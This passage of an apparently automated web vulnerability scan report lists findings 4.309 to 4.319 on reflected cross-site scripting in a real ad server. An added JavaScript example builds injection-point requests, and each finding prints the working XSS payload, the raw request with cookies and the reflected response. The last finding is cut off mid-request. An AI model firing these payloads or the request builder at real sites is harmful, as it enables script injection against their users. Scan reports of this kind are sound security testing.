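Findings 4.304 to 4.308 are the injection points the crawler derives from a single URL: each path segment ("REST URL parameter" N, numbered from the first segment after the host), each query parameter (here a bare token with no `=`, so the payload is appended to the token itself), and one extra parameter whose name is the payload. Only the points whose payload is echoed unmodified become findings, which is why REST URL parameters 2, 3 and 4 are listed for this path but not 1. The following is an added example, not the crawler's code, that reproduces that enumeration and the raw request line each point sends. The input URL and payload are copied from the findings; the payload shape (five hex digits, the probe, eleven hex digits) mirrors the markers in the report.

```javascript
// Added example, not the crawler's code: enumerate the injection points a
// scanner derives from one URL, named as in this report, and build the raw
// request each produces. Input URL and payload are taken from findings 4.304-4.308.
const REPORT_URL = 'http://dm.de.mookie1.com/2/B3DM/2010DM/11452529046@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_300';
const REPORT_PAYLOAD = '70ff5"><script>alert(1)</script>d6553860e48';

function hexMarker(length) {
  let out = '';
  while (out.length < length) out += Math.floor(Math.random() * 16).toString(16);
  return out;
}

// Payload shape as in the report: 5 hex digits, probe, 11 hex digits, so a
// reflection can be located exactly and distinguished from other instances.
function makePayload(probe) {
  return hexMarker(5) + probe + hexMarker(11);
}

// Split a URL into raw parts without the WHATWG URL parser, which would
// percent-encode the quote and angle brackets the probe relies on.
function splitRawUrl(rawUrl) {
  const m = /^(https?):\/\/([^\/?#]+)(\/[^?#]*)?(?:\?([^#]*))?/.exec(rawUrl);
  if (!m) throw new Error('not an absolute http(s) URL: ' + rawUrl);
  return { scheme: m[1], host: m[2], path: m[3] || '/', query: m[4] === undefined ? null : m[4] };
}

function buildInsertionPoints(rawUrl, payload) {
  const { scheme, host, path, query } = splitRawUrl(rawUrl);
  const segments = path.split('/').slice(1); // drop the empty element before the leading '/'
  const points = [];
  const assemble = (p, q) => scheme + '://' + host + p + (q === null ? '' : '?' + q);

  // REST URL parameters: each path segment, numbered from 1, payload appended to it.
  segments.forEach((seg, i) => {
    const mutated = segments.slice();
    mutated[i] = seg + payload;
    points.push({ name: 'REST URL parameter ' + (i + 1), url: assemble('/' + mutated.join('/'), query) });
  });

  if (query !== null) {
    const params = query.split('&');
    // Each query parameter: payload appended to the token, which is the value when
    // '=' is present and the bare name otherwise (USNetwork/RS_SELL_2011Q1_AOL_CPA_300).
    params.forEach((param, i) => {
      const eq = param.indexOf('=');
      const name = eq === -1 ? param : param.slice(0, eq);
      const mutated = params.slice();
      mutated[i] = param + payload;
      points.push({ name: name + ' parameter', url: assemble(path, mutated.join('&')) });
    });
    // One more parameter whose name is the payload, value 1.
    points.push({ name: 'name of an arbitrarily supplied request parameter', url: assemble(path, query + '&' + payload + '=1') });
  } else {
    points.push({ name: 'name of an arbitrarily supplied request parameter', url: assemble(path, payload + '=1') });
  }
  return points;
}

// Raw request as the report shows it: the payload goes on the request line as-is,
// not percent-encoded.
function toRawRequest(url) {
  const { host, path, query } = splitRawUrl(url);
  return 'GET ' + path + (query === null ? '' : '?' + query) + ' HTTP/1.1\r\nHost: ' + host + '\r\n\r\n';
}

for (const point of buildInsertionPoints(REPORT_URL, REPORT_PAYLOAD)) {
  console.log('[' + point.name + ']');
  console.log(toRawRequest(point.url));
}
```

Sending the requests is left out on purpose; the point is the request shape. Compare the output for REST URL parameter 2 with the captured request in 4.304 and the added-parameter case with 4.308: the mutations match character for character. A real run would pair each request with the reflection check from the response side (the payload present byte-for-byte in the body) before raising an issue.
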
4.309. http://dm.de.mookie1.com/2/B3DM/2010DM/11542712710@x23 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/11542712710@x23

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bdb7f"><script>alert(1)</script>e7d57906e4a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DMbdb7f"><script>alert(1)</script>e7d57906e4a/2010DM/11542712710@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_300 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e6f45525d5f4f58455e445a4a423660; session=1296256112|1296260059

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:00:46 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 334
Content-Type: text/html

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DMbdb7f"><script>alert(1)</script>e7d57906e4a/2010DM/1721942303/x23/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><
...[SNIP]...

4.310. http://dm.de.mookie1.com/2/B3DM/2010DM/11542712710@x23 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/11542712710@x23

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a9d3c"><script>alert(1)</script>11d0b336fd9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DMa9d3c"><script>alert(1)</script>11d0b336fd9/11542712710@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_300 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e6f45525d5f4f58455e445a4a423660; session=1296256112|1296260059

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:01:13 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 333
Content-Type: text/html

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/2010DMa9d3c"><script>alert(1)</script>11d0b336fd9/305405675/x23/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><I
...[SNIP]...

4.311. http://dm.de.mookie1.com/2/B3DM/2010DM/11542712710@x23 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/11542712710@x23

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d02f1"><script>alert(1)</script>ede31db6dca was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DM/11542712710@x23d02f1"><script>alert(1)</script>ede31db6dca?USNetwork/RS_SELL_2011Q1_AOL_CPA_300 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e6f45525d5f4f58455e445a4a423660; session=1296256112|1296260059

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:01:20 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 326
Content-Type: text/html

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/2010DM/1884793408/x23d02f1"><script>alert(1)</script>ede31db6dca/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><
...[SNIP]...

4.312. http://dm.de.mookie1.com/2/B3DM/2010DM/11542712710@x23 [USNetwork/RS_SELL_2011Q1_AOL_CPA_300 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/11542712710@x23

Issue detail

The value of the USNetwork/RS_SELL_2011Q1_AOL_CPA_300 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 495ac"-alert(1)-"d325f4e03a6 was submitted in the USNetwork/RS_SELL_2011Q1_AOL_CPA_300 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/B3DM/2010DM/11542712710@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_300495ac"-alert(1)-"d325f4e03a6 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e6f45525d5f4f58455e445a4a423660; session=1296256112|1296260059

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:00:44 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2483
Content-Type: text/html

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e);
}
var camp="USNetwork/RS_SELL_2011Q1_AOL_CPA_300495ac"-alert(1)-"d325f4e03a6";

camp=camp.toUpperCase();

if((camp.indexOf("AOL") == -1 )&&(camp.indexOf("GGL")) == -1){
   if((cookie_check("dlx_20100929=",document.cookie)).length == 0) {

       // Set cookie with marker to ch
...[SNIP]...

4.313. http://dm.de.mookie1.com/2/B3DM/2010DM/11542712710@x23 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/11542712710@x23

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 55739"-alert(1)-"ce4a27e97fe was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/B3DM/2010DM/11542712710@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_300&55739"-alert(1)-"ce4a27e97fe=1 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e6f45525d5f4f58455e445a4a423660; session=1296256112|1296260059

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:00:44 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2486
Content-Type: text/html

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e);
}
var camp="USNetwork/RS_SELL_2011Q1_AOL_CPA_300&55739"-alert(1)-"ce4a27e97fe=1";

camp=camp.toUpperCase();

if((camp.indexOf("AOL") == -1 )&&(camp.indexOf("GGL")) == -1){
   if((cookie_check("dlx_20100929=",document.cookie)).length == 0) {

       // Set cookie with marker to
...[SNIP]...

4.314. http://dm.de.mookie1.com/2/B3DM/2010DM/11687741401@x23 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/11687741401@x23

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c4a53"><script>alert(1)</script>840ef40ea8a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DMc4a53"><script>alert(1)</script>840ef40ea8a/2010DM/11687741401@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_300 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://bh.heraldinteractive.com/includes/processAds.bg?position=Middle&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:00:44 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 333
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2145525d5f4f58455e445a4a423660;path=/

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DMc4a53"><script>alert(1)</script>840ef40ea8a/2010DM/810804691/x23/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><I
...[SNIP]...

4.315. http://dm.de.mookie1.com/2/B3DM/2010DM/11687741401@x23 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/11687741401@x23

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 64f21"><script>alert(1)</script>bbec3aa3a93 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DM64f21"><script>alert(1)</script>bbec3aa3a93/11687741401@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_300 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://bh.heraldinteractive.com/includes/processAds.bg?position=Middle&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:00:49 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 334
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2345525d5f4f58455e445a4a423660;path=/

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/2010DM64f21"><script>alert(1)</script>bbec3aa3a93/1610556719/x23/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><
...[SNIP]...

4.316. http://dm.de.mookie1.com/2/B3DM/2010DM/11687741401@x23 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/11687741401@x23

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b10ef"><script>alert(1)</script>b222cfdaba7 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DM/11687741401@x23b10ef"><script>alert(1)</script>b222cfdaba7?USNetwork/RS_SELL_2011Q1_AOL_CPA_300 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://bh.heraldinteractive.com/includes/processAds.bg?position=Middle&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:01:16 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 326
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2245525d5f4f58455e445a4a423660;path=/

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/2010DM/1804525218/x23b10ef"><script>alert(1)</script>b222cfdaba7/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><
...[SNIP]...

4.317. http://dm.de.mookie1.com/2/B3DM/2010DM/11687741401@x23 [USNetwork/RS_SELL_2011Q1_AOL_CPA_300 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/11687741401@x23

Issue detail

The value of the USNetwork/RS_SELL_2011Q1_AOL_CPA_300 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9c13b"-alert(1)-"885857494a0 was submitted in the USNetwork/RS_SELL_2011Q1_AOL_CPA_300 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/B3DM/2010DM/11687741401@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_3009c13b"-alert(1)-"885857494a0 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://bh.heraldinteractive.com/includes/processAds.bg?position=Middle&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:00:39 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2483
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3945525d5f4f58455e445a4a423660;path=/

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e);
}
var camp="USNetwork/RS_SELL_2011Q1_AOL_CPA_3009c13b"-alert(1)-"885857494a0";

camp=camp.toUpperCase();

if((camp.indexOf("AOL") == -1 )&&(camp.indexOf("GGL")) == -1){
   if((cookie_check("dlx_20100929=",document.cookie)).length == 0) {

       // Set cookie with marker to ch
...[SNIP]...

4.318. http://dm.de.mookie1.com/2/B3DM/2010DM/11687741401@x23 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/11687741401@x23

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b8ab5"-alert(1)-"7b522b29148 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/B3DM/2010DM/11687741401@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_300&b8ab5"-alert(1)-"7b522b29148=1 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://bh.heraldinteractive.com/includes/processAds.bg?position=Middle&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:00:43 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2486
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2645525d5f4f58455e445a4a423660;path=/

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e);
}
var camp="USNetwork/RS_SELL_2011Q1_AOL_CPA_300&b8ab5"-alert(1)-"7b522b29148=1";

camp=camp.toUpperCase();

if((camp.indexOf("AOL") == -1 )&&(camp.indexOf("GGL")) == -1){
   if((cookie_check("dlx_20100929=",document.cookie)).length == 0) {

       // Set cookie with marker to
...[SNIP]...

4.319. http://dm.de.mookie1.com/2/B3DM/2010DM/1169827066@x23 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/1169827066@x23

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 770f6"><script>alert(1)</script>7298dce66c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM770f6"><script>alert(1)</script>7298dce66c/2010DM/1169827066@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_728 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://bh.heraldinteractive.com/includes/processAds.bg?position=Top&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome
